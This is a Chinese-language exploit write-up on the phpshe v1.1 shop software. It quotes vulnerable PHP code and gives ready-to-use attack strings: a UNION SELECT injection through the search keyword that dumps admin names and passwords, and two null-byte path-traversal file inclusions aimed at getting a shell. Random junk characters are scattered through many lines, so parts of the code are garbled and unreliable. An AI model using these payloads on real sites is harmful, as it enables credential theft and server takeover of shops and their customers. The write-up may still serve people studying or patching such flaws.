phpshe v1.1多处SQL注入和文件包含漏洞Getshell

admin

/*******************************************************/
/* Phpshe v1.1 Vulnerability
* R: Z% S; J1 F1 H/* ========================
* {; d- g. Y6 q( N& h4 u/* By: : Kn1f3
6 e9 ?& b* K' r" r+ i9 l  u/* E-Mail : 681796@qq.com
# j* `% b+ p" D8 ^* g) p' b/*******************************************************/
1 `  q+ g! _: K5 Z+ e0×00 整体大概参数传输

  ^5 S8 n/ v3 F# V' F0 o
9 B5 a9 X1 i% }4 U+ D% p
$ c" O* c3 w! C* m9 y//common.php
5 \- `, c8 q9 i; `" N' h9 p' zif (get_magic_quotes_gpc()) {
1 I; i" r1 B9 e3 ]0 S% L9 T2 A- |!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
}
, b9 d* C+ }  O& T% k8 ielse {
. B' w9 w9 D+ p# Q$ a2 A!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
: r8 k/ o) }5 t7 Q!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
}
session_start();
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
' f9 v; T; Y* q, C% c  w!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
! g; T' U- J1 B' ~6 q; h. m
0×01 包含漏洞
1 F1 ~! _" n- p) C1 o6 k# L& l9 L
# g: z7 d( @, A2 `( a
9 [- ~5 H8 D: l. d//首页文件
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
pe_result();
, y" q( ?: ^$ {7 H1 T% |?>
3 g2 ~: _" q! y4 Y% K+ W1 k* y//common 文件 第15行开始
! s' a5 D$ ~0 g8 |% curl路由配置
$module = $mod = $act = 'index';
1 s8 o9 I/ m3 K6 r$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
- E6 y% b5 Q: ^  w& H$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
//exp：http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00

, a; Y9 N9 R8 z3 P9 E6 M
0×02 搜索注入

# f$ \! y$ Q& Q  O5 p<code id="code2">

//product.php文件
7 I9 g4 i# C9 d7 `6 `4 r; Ecase 'list':
$category_id = intval($id);
$info = $db->pe_select('category', array('category_id'=>$category_id));
$ Y' e1 _3 M- d$ ?: k8 h4 q+ W//搜索
/ I+ Y: G1 B$ S# N4 k8 ~$sqlwhere = " and `product_state` = 1";
% ^; z/ F# g0 Cpe_lead('hook/category.hook.php');
# P5 ?' |$ b+ T2 y) L* V" [" hif ($category_id) {
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
2 w# ~) k7 V8 v' A0 s}
  s# z! K* Q2 |" V$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
if ($_g_orderby) {
0 H. M0 n1 H+ ]# j) B0 u5 _% t" F$ I+ V$orderby = explode('_', $_g_orderby);
8 p0 K1 Q$ E- \0 o- v3 w$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
}
else {
$sqlwhere .= " order by `product_id` desc";
, w) O" |( f  z* T}
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
//热卖排行
4 a* L- l' [, \/ T6 m7 B$product_hotlist = product_hotlist();
//当前路径
$nowpath = category_path($category_id);
  S$ o5 X, M/ N' X( S3 x, s; x$seo = pe_seo($info['category_name']);
$ A8 [1 z+ {% V( ]include(pe_tpl('product_list.html'));
8 f7 W( Z" z/ [, F& U2 y* w) Z//跟进selectall函数库
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
9 J2 v, @" V/ Y5 @7 t, u{
//处理条件语句
$sqlwhere = $this->_dowhere($where);
  W4 x$ {0 A" e% U3 D# S& Lreturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
- Z1 k' j0 k" {) [* Q}
! r- {" b$ c. ]0 I//exp
( |# t4 P/ L) X. r, Fproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
5 v; v: L1 f) W' V. e+ J- N

</code>

0×03 包含漏洞2

<code id="code3">

//order.php

case 'pay':

$order_id = pe_dbhold($_g_id);

9 G$ Q- [1 N1 [& W4 Z" i3 b& V/ [$cache_payway = cache::get('payway');

! d0 c4 w4 x# j, Y" @& L  Aforeach($cache_payway as $k => $v) {

: |9 ]: ?8 F- D# o7 Q2 ^4 G$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

2 E% J+ K# d5 D* i- z3 U; \if ($k == 'bank') {

$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

}

) F1 I6 z: y! M! I" R. l5 e}

+ Z0 }7 X0 t. R9 _1 K3 Y! k$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

/ T: G7 o5 q7 g& x( {, C# _' o) ?!$order['order_id'] && pe_error('订单号错误...');

if (isset($_p_pesubmit)) {

if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

- p& \4 b( _6 g4 j0 G6 Xforeach ($info_list as $v) {

$order['order_name'] .= "{$v['product_name']};";

# a  K2 k3 h6 q: a3 e}

echo '正在为您连接支付网站，请稍后...';

% @0 P3 x4 N" _* y, H7 Hinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

! N' C  H9 f. b9 E2 y; v* c}//当一切准备好的时候就可以进行"鸡肋包含了"

else {

pe_error('支付错误...');

9 g1 [% J! M; j& k) E}

5 w  S( E, Y- f}

- z  N! y- f* ]( k$seo = pe_seo('选择支付方式');

+ \1 P% M5 _5 k  l3 jinclude(pe_tpl('order_pay.html'));

break;

}

//exp：

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
5 ^6 E  v4 P1 a+ }% ehttp://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg